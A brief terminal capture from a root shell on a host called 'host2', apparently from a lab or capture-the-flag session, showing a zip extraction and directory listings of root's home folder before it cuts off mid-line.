extracting: mike
root@host2:~# ls
ls
mike mike.zip
root@host2:~# ls -alh
ls -alh
total 32K
drwx------ 4 root root 4.0K Nov 6 17:28 .
drwxr-xr-x 22 root root 4.0K Jun 29 2021 ..
lrwxrwxrwx 1 root root 9 Jul 19 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4.0K Jul 15 2021 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K J